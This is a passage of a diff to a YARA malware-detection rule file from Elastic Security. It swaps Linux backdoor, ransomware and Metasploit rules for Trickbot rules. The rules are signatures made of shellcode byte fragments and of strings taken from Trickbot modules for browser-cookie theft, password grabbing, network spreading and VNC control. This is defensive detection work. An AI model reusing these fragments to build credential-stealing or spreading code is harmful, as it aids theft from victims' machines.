C0 31 E8 83 7D 0C 00 89 44 24 38 0F 29 44 24 20 0F 29 44 24 10 0F 29 } condition: all of them } -rule ELASTIC_Linux_Backdoor_Bash_E427876D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_997B25A0 : FILE MEMORY { meta: - description = "Detects Linux Backdoor Bash (Linux.Backdoor.Bash)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "e427876d-c7c5-447a-ad6d-5cbc12d9dacf" - date = "2021-01-12" - modified = "2021-09-16" + id = "997b25a0-aeac-4f74-aa87-232c4f8329b6" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Backdoor_Bash.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "07db41a4ddaac802b04df5e5bbae0881fead30cb8f6fa53a8a2e1edf14f2d36b" - logic_hash = "fdd066b746416730419787d21eb53fa2ba997679a237d9db3a2e1365d43df892" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L326-L343" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ca688086c4628c64c32a99083d620bcb5373e3100d154331451a3e9f86081aca" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "6cc13bb2591d896affc58f4a22b3463a72f6c9d896594fe1714b825e064b0956" + fingerprint = "0bba1c5284ed0548f51fdfd6fb96e24f92f7f4132caefbf0704efb0b1a64b7c4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 67 65 44 6F 6B 4B 47 6C 6B 49 43 31 31 4B 54 6F 67 4C 32 56 } + $a = { 85 D2 74 F0 C6 45 E1 20 8D 4D E1 C6 45 E2 4A C6 45 E3 4A C6 45 } condition: all of them } -rule ELASTIC_Windows_Trojan_Dbatloader_F93A8E90 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_B17B33A1 : FILE MEMORY { meta: - description = "Detects Windows Trojan Dbatloader (Windows.Trojan.DBatLoader)" + description = "Detects Windows Trojan Trickbot (Windows.Trojan.Trickbot)" author = "Elastic Security" - id = "f93a8e90-10ac-44de-ac3b-c0e976628e98" - date = "2022-03-11" - modified = "2022-04-12" + id = "b17b33a1-1021-4980-8ffd-2e7aa4ca2ae4" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DBatLoader.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f72d7e445702bbf6b762ebb19d521452b9c76953d93b4d691e0e3e508790256e" - logic_hash = "6fe91d91bb383c66a6dc623b02817411a39b88030142517f4048c5c25fbb4ac5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L345-L362" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7fa69674d1e985bafe310597f23ae80113136768141f0a1931baf88b2509e6ef" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "81b87663fbad9854430e5c4dcade464a15b995e645f9993a3e234593ee4df901" + fingerprint = "753d15c1ff0cc4cf75250761360bb35280ff0a1a4d34320df354e0329dd35211" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99493,89 +99769,117 @@ rule ELASTIC_Windows_Trojan_Dbatloader_F93A8E90 : FILE MEMORY os = "windows" strings: - $a = { FF 00 74 17 8B 45 E8 0F B6 7C 18 FF 66 03 7D EC 66 0F AF 7D F4 66 03 } + $a = { 08 53 55 56 57 64 A1 30 00 00 00 89 44 24 10 8B 44 24 10 8B } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Ursu_3C05F8Ab : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_23D77Ae5 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Ursu (Linux.Cryptominer.Ursu)" + description = "Targets importDll64 containing Browser data stealer module" author = "Elastic Security" - id = "3c05f8ab-d1b8-424b-99b7-1fe292ae68ff" - date = "2021-01-12" - modified = "2021-09-16" + id = "23d77ae5-80de-4bb0-8701-ddcaff443dcc" + date = "2021-03-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Ursu.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d72361010184f5a48386860918052dbb8726d40e860ea0287994936702577956" - logic_hash = "8261e4ee40131cd7df61914cd7bdf154e8a2b5fa3abd9d301436f9371253f510" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L364-L396" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "844974a2d3266e1f9ba275520c0e8a5d176df69a0ccd5135b99facf798a5d209" + logic_hash = "e5f5cf854ebd0e25fffbd6796217f22223a06937e1cacb33baa105ac41731256" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "463d4f675589e00284103ef53d0749539152bbc3772423f89a788042805b3a21" + fingerprint = "d382a99e5eed87cf2eab5e238e445ca0bf7852e40b0dd06a392057e76144699f" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 64 55 4C 2C 20 0A 09 30 78 33 30 32 38 36 30 37 38 32 38 37 38 } + $a1 = "/system32/cmd.exe /c \"start microsoft-edge:{URL}\"" ascii fullword + $a2 = "SELECT name, value, host_key, path, expires_utc, creation_utc, encrypted_value FROM cookies" ascii fullword + $a3 = "attempt %d. Cookies not found" ascii fullword + $a4 = "attempt %d. History not found" ascii fullword + $a5 = "Cookies version is %d (%d)" ascii fullword + $a6 = "attempt %d. Local Storage not found" ascii fullword + $a7 = "str+='xie.com.'+p+'.guid='+'{'+components[i]+'}\\n';" ascii fullword + $a8 = "Browser exec is: %s" ascii fullword + $a9 = "found mozilla key: %s" ascii fullword + $a10 = "Version %d is not supported" ascii fullword + $a11 = "id %d - %s" ascii fullword + $a12 = "prot: %s, scope: %s, port: %d" ascii fullword + $a13 = "***** Send %d bytes to callback from %s *****" ascii fullword + $a14 = "/chrome.exe {URL}" ascii fullword condition: - all of them + 4 of ($a*) } -rule ELASTIC_Linux_Ransomware_Clop_728Cf32A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_5574Be7D : FILE MEMORY { meta: - description = "Detects Linux Ransomware Clop (Linux.Ransomware.Clop)" + description = "Targets injectDll64 containing injection functionality to steal banking credentials" author = "Elastic Security" - id = "728cf32a-94c1-4979-b092-6851649946be" - date = "2023-07-27" - modified = "2024-02-13" + id = "5574be7d-7502-4357-8110-2fb4a661b2bd" + date = "2021-03-29" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Clop.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "09d6dab9b70a74f61c41eaa485b37de9a40c86b6d2eae7413db11b4e6a8256ef" - logic_hash = "31c2fdfcfc46ad1dd69489536172937b9771d8505f36c7bd8dc796f40a2fe4d2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L398-L432" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8c5c0d27153f60ef8aec57def2f88e3d5f9a7385b5e8b8177bab55fa7fac7b18" + logic_hash = "ed0fc98c5d628ce38b923e1410eaf7a4a65ecffea42bed35314e30c99a52219b" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "86644f9f1e9f0b69896cd05ae1442a3b99483cc0ff15773c0c3403e59b6d5c97" + fingerprint = "23d9b89917a0fc5aad903595b89b650f6dbb0f82ce28ce8bcc891904f62ccf1b" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "CONTACT US BY EMAIL:" - $a2 = "OR WRITE TO THE CHAT AT->" - $a3 = "(use TOR browser)" - $a4 = ".onion/" + $a1 = "webinject64.dll" ascii fullword + $a2 = "Mozilla Firefox version: %s" ascii fullword + $a3 = "socks=127.0.0.1:" ascii fullword + $a4 = "" ascii fullword + $a5 = "" ascii fullword + $a6 = "https://%.*s%.*s" ascii fullword + $a7 = "http://%.*s%.*s" ascii fullword + $a8 = "Chrome version: %s" ascii fullword + $a9 = "IE version real: %s" ascii fullword + $a10 = "IE version old: %s" ascii fullword + $a11 = "Build date: %s %s" ascii fullword + $a12 = "EnumDpostServer" ascii fullword + $a13 = "ESTR_PASS_" ascii fullword + $a14 = "" ascii fullword + $a15 = "" ascii fullword + $a16 = "" ascii fullword condition: - 3 of them + 4 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_A6E956C9 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_1473F0B4 : FILE MEMORY { meta: - description = "Identifies the API address lookup function leverage by metasploit shellcode" + description = "Targets mailsearcher64.dll module" author = "Elastic Security" - id = "a6e956c9-799e-49f9-b5c5-ac68aaa2dc21" - date = "2021-03-23" + id = "1473f0b4-a6b5-4b19-a07e-83d32a7e44a0" + date = "2021-03-29" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fb4e3e54618075d5ef6ec98d1ba9c332ce9f677f0879e07b34a2ca08b2180dd9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L434-L459" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9cfb441eb5c60ab1c90b58d4878543ee554ada2cceee98d6b867e73490d30fec" + logic_hash = "dc13625e58c029c60b8670f8e63cd7786bf3e9705c462f3cbbf5b39e7c02f9a1" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "21855599bc51ec2f71d694d4e0f866f815efe54a42842dfe5f8857811530a686" - threat_name = "Windows.Trojan.Metasploit" + fingerprint = "15438ae141a2ac886b1ba406ba45119da1a616c3b2b88da3f432253421aa8e8b" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99583,86 +99887,122 @@ rule ELASTIC_Windows_Trojan_Metasploit_A6E956C9 : FILE MEMORY os = "windows" strings: - $a1 = { 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 } + $a1 = "mailsearcher.dll" ascii fullword + $a2 = "%s/%s/%s/send/" wide fullword + $a3 = "Content-Disposition: form-data; name=\"list\"" ascii fullword + $a4 = "no" ascii fullword + $a6 = "=Waitu H" ascii fullword + $a7 = "Content-Length: %d" ascii fullword condition: - $a1 + 2 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_38B8Ceec : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Dcf25Dde : FILE MEMORY { meta: - description = "Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)." + description = "Targets networkDll64.dll module containing functionality to gather network and system information" author = "Elastic Security" - id = "38b8ceec-601c-4117-b7a0-74720e26bf38" - date = "2021-03-23" + id = "dcf25dde-36c4-4a24-aa2b-0b3f42324918" + date = "2021-03-29" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8e3bc02661cedb9885467373f8120542bb7fc8b0944803bc01642fbc8426298b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L461-L502" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ba2a255671d33677cab8d93531eb25c0b1f1ac3e3085b95365a017463662d787" + logic_hash = "64d15d92faf0919a8fa1ce6772750cde47eaa24b09cf4243393777334bad9712" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342" - threat_name = "Windows.Trojan.Metasploit" - severity = 85 + fingerprint = "4088ae29cb3b665ccedf69e9d02c1ff58620d4b589343cd4077983b25c5b479f" + threat_name = "Windows.Trojan.Trickbot" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61 } + $a1 = "Host Name - %s" wide fullword + $a2 = "Last Boot Up Time - %02u/%02u/%04u %02d.%02d.%02d" wide fullword + $a3 = "Install Date - %02u/%02u/%04u %02d.%02d.%02d" wide fullword + $a4 = "System Directory - %s" wide fullword + $a5 = "OS Version - %s" wide fullword + $a6 = "***PROCESS LIST***" wide fullword + $a7 = "Product Type - Domain Controller" wide fullword + $a8 = "Registered Organization - %s" wide fullword + $a9 = "Product Type - Domain Controller" wide fullword + $a10 = "Build Type - %s" wide fullword + $a11 = "Boot Device - %s" wide fullword + $a12 = "Serial Number - %s" wide fullword + $a13 = "OS Architecture - %s" wide fullword + $a14 = "" ascii fullword + $a4 = "yesyes" ascii fullword + $a9 = "Grab_Passwords_Chrome(): Can't open database" ascii fullword + $a10 = "UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_" + $a11 = "Chrome login db copied" ascii fullword + $a12 = "Skip Chrome login db copy" ascii fullword + $a13 = "Mozilla\\Firefox\\Profiles\\" ascii fullword + $a14 = "Grab_Passwords_Chrome() success" ascii fullword + $a15 = "No password provided by user" ascii fullword + $a16 = "Chrome login db should be copied (copy absent)" ascii fullword + $a17 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" wide fullword condition: - $a1 + 4 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_0F5A852D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_D2110921 : FILE MEMORY { meta: - description = "Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families." + description = "Targets shareDll64.dll module containing functionality use to spread Trickbot across local networks" author = "Elastic Security" - id = "0f5a852d-cacd-43d7-8754-204b09afba2f" - date = "2021-04-07" + id = "d2110921-b957-49b7-8a26-4c0b7d1d58ad" + date = "2021-03-29" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "11cddf2191a2f70222a0c8c591e387b4b5667bc432a2f686629def9252361c1d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L603-L632" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05ef40f7745db836de735ac73d6101406e1d9e58c6b5f5322254eb75b98d236a" + logic_hash = "39ef17836f29c358f596e0047d582b5f1d1af523c8f6354ac8a783eda9969554" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d" - threat_name = "Windows.Trojan.Metasploit" - severity = 80 + fingerprint = "55dbbcbc77ec51a378ad2ba8d56cb0811d23b121cacd037503fd75d08529c5b5" + threat_name = "Windows.Trojan.Trickbot" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5 } + $a1 = "module64.dll" ascii fullword + $a2 = "Size - %d kB" ascii fullword + $a3 = "%s - FAIL" wide fullword + $a4 = "%s - SUCCESS" wide fullword + $a5 = "ControlSystemInfoService" ascii fullword + $a6 = "yes" ascii fullword + $a7 = "Copy: %d" wide fullword + $a8 = "Start sc 0x%x" wide fullword + $a9 = "Create sc 0x%x" wide fullword + $a10 = "Open sc %d" wide fullword + $a11 = "ServiceInfoControl" ascii fullword condition: - all of them + 3 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_C9773203 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_0114D469 : FILE MEMORY { meta: - description = "Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families." + description = "Targets systeminfo64.dll module containing functionality use to retrieve system information" author = "Elastic Security" - id = "c9773203-6d1e-4246-a1e0-314217e0207a" - date = "2021-04-07" + id = "0114d469-8731-4f4f-8657-49cded5efadb" + date = "2021-03-29" modified = "2021-08-23" - reference = "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L121-L140" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1d6503ccf05b8e8b4368ed0fb2e57aa2be94151ce7e2445b5face7b226a118e9" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L634-L667" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "083cb35a7064aa5589efc544ac1ed1b04ec0f89f0e60383fcb1b02b63f4117e9" + logic_hash = "6ca8e73f758d3fa956fe53cc83abb43806359f93df05c42a58e2f394a1a3c117" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36" - threat_name = "Windows.Trojan.Metasploit" - severity = 10 + fingerprint = "4f1fa072f4ba577d590bb8946ea9b9774aa291cb2406f13be5932e97e8e760c6" + threat_name = "Windows.Trojan.Trickbot" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1 } + $a1 = "%s" wide fullword + $a2 = "%s" wide fullword + $a3 = "" wide fullword + $a4 = "" wide fullword + $a5 = "%s%s%s" wide fullword + $a6 = "%s" wide fullword + $a7 = "no2" ascii fullword + $a8 = "%s" wide fullword + $a9 = "%s" wide fullword + $a10 = "" wide fullword + $a11 = "" wide fullword + $a12 = "" wide fullword + $a13 = "SELECT * FROM Win32_Processor" wide fullword + $a14 = "SELECT * FROM Win32_OperatingSystem" wide fullword + $a15 = "SELECT * FROM Win32_ComputerSystem" wide fullword condition: - all of them + 6 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_Dd5Ce989 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_07239Dad : FILE MEMORY { meta: - description = "Identifies Meterpreter DLL used by Metasploit" + description = "Targets vncDll64.dll module containing remote control VNC functionality" author = "Elastic Security" - id = "dd5ce989-3925-4e27-97c1-3b8927c557e9" - date = "2021-04-14" + id = "07239dad-7f9e-4b20-a691-d9538405b931" + date = "2021-03-29" modified = "2021-08-23" - reference = "https://www.rapid7.com/blog/post/2015/03/25/stageless-meterpreter-payloads/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L142-L164" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "86cf98bf854b01a55e3f306597437900e11d429ac6b7781e090eeda3a5acb360" - logic_hash = "5c094979be1cd347ffee944816b819b6fbb62804b183a6120cd3a93d2759155b" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L669-L703" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dbd534f2b5739f89e99782563062169289f23aa335639a9552173bedc98bb834" + logic_hash = "231592d1a45798de6d22c922626ca28ef4019bae95d552a0f2822823d8dec384" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4fc7c309dca197f4626d6dba8afcd576e520dbe2a2dd6f7d38d7ba33ee371d55" - threat_name = "Windows.Trojan.Metasploit" - severity = 90 + fingerprint = "32d63b8db4307fd67e2c9068e22f843f920f19279c4a40e17cd14943577e7c81" + threat_name = "Windows.Trojan.Trickbot" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "metsrv.x64.dll" fullword - $a2 = "metsrv.dll" fullword - $b1 = "ReflectiveLoader" + $a1 = "C:\\Users\\MaxMikhaylov\\Documents\\Visual Studio 2010\\MMVNC.PROXY\\VNCSRV\\x64\\Release\\VNCSRV.pdb" ascii fullword + $a2 = "vncsrv.dll" ascii fullword + $a3 = "-new -noframemerging http://www.google.com" ascii fullword + $a4 = "IE.HTTP\\shell\\open\\command" ascii fullword + $a5 = "EDGE\\shell\\open\\command" ascii fullword + $a6 = "/K schtasks.exe |more" ascii fullword + $a7 = " " ascii fullword + $a8 = "\\Microsoft Office\\Office16\\outlook.exe" ascii fullword + $a9 = "\\Microsoft Office\\Office11\\outlook.exe" ascii fullword + $a10 = "\\Microsoft Office\\Office15\\outlook.exe" ascii fullword + $a11 = "\\Microsoft Office\\Office12\\outlook.exe" ascii fullword + $a12 = "\\Microsoft Office\\Office14\\outlook.exe" ascii fullword + $a13 = "TEST.TEMP:" ascii fullword + $a14 = "Chrome_WidgetWin" wide fullword + $a15 = "o --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas" ascii fullword + $a16 = "NetServerStart" ascii fullword condition: - 1 of ($a*) and 1 of ($b*) + 6 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_96233B6B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_Fd7A39Af : FILE MEMORY { meta: - description = "Identifies another 64 bit API hashing function used by Metasploit." + description = "Targets wormDll64.dll module containing spreading functionality" author = "Elastic Security" - id = "96233b6b-d95a-4e0e-8f83-f2282a342087" - date = "2021-06-10" + id = "fd7a39af-c6ea-4682-a00a-01f775c3bb8d" + date = "2021-03-29" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L166-L185" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e7a2d966deea3a2df6ce1aeafa8c2caa753824215a8368e0a96b394fb46b753b" - logic_hash = "09a2b9414a126367df65322966b671fe7ea963cd65ef48e316c9d139ee502d31" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L705-L739" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d5bb8d94b71d475b5eb9bb4235a428563f4104ea49f11ef02c8a08d2e859fd68" + logic_hash = "15cb286504e6167c78e194488555f565965a03e7714fe16692a115df26985a01" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "40032849674714bc9eb020971dd9f27a07b53b8ff953b793cb3aad136256fd70" - threat_name = "Windows.Trojan.Metasploit" + fingerprint = "3f2e654f2ffdd940c27caec3faeb4bda24c797a17d0987378e36c1e16fadc772" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99819,29 +100230,44 @@ rule ELASTIC_Windows_Trojan_Metasploit_96233B6B : FILE MEMORY os = "windows" strings: - $a = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 31 FF 0F B7 4A 26 31 C0 AC 3C 61 7C 02 2C 20 C1 CF 0D } + $a1 = "module64.dll" ascii fullword + $a2 = "worming.png" wide + $a3 = "Size - %d kB" ascii fullword + $a4 = "[+] %s -" wide fullword + $a5 = "%s\\system32" ascii fullword + $a6 = "[-] %s" wide fullword + $a7 = "yesyes" ascii fullword + $a8 = "*****MACHINE IN WORKGROUP*****" wide fullword + $a9 = "*****MACHINE IN DOMAIN*****" wide fullword + $a10 = "\\\\%s\\IPC$" ascii fullword + $a11 = "Windows 5" ascii fullword + $a12 = "InfMach" ascii fullword + $a13 = "%s x64" wide fullword + $a14 = "%s x86" wide fullword + $a15 = "s(&(objectCategory=computer)(userAccountControl:" wide fullword + $a16 = "------MACHINE IN D-N------" wide fullword condition: - all of them + 5 of ($a*) } -rule ELASTIC_Windows_Trojan_Metasploit_4A1C4Da8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Trickbot_2D89E9Cd : FILE MEMORY { meta: - description = "Identifies Metasploit 64 bit reverse tcp shellcode." + description = "Targets tabDll64.dll module containing functionality using SMB for lateral movement" author = "Elastic Security" - id = "4a1c4da8-837d-4ad1-a672-ddb8ba074936" - date = "2021-06-10" + id = "2d89e9cd-2941-4b20-ab4e-a487d329ff76" + date = "2021-03-29" modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Metasploit.yar#L187-L206" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22" - logic_hash = "9d3a3164ed1019dcb557cf20734a81be9964a555ddb2e0104f7202880b2ed177" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Trickbot.yar#L741-L785" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3963649ebfabe8f6277190be4300ecdb68d4b497ac5f81f38231d3e6c862a0a8" + logic_hash = "c15833687c2aed55aae0bb5de83c088cb66edeb4ad1964543522f5477c1f1942" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987" - threat_name = "Windows.Trojan.Metasploit" + fingerprint = "e6eea38858cfbbe5441b1f69c5029ff9279e7affa51615f6c91981fe656294fc" + threat_name = "Windows.Trojan.Trickbot" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -99849,28 +100275,54 @@ rule ELASTIC_Windows_Trojan_Metasploit_4A1C4Da8 : FILE MEMORY os = "windows" strings: - $a = { 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08 } + $a1 = "[INJECT] inject_via_remotethread_wow64: pExecuteX64( pX64function, ctx 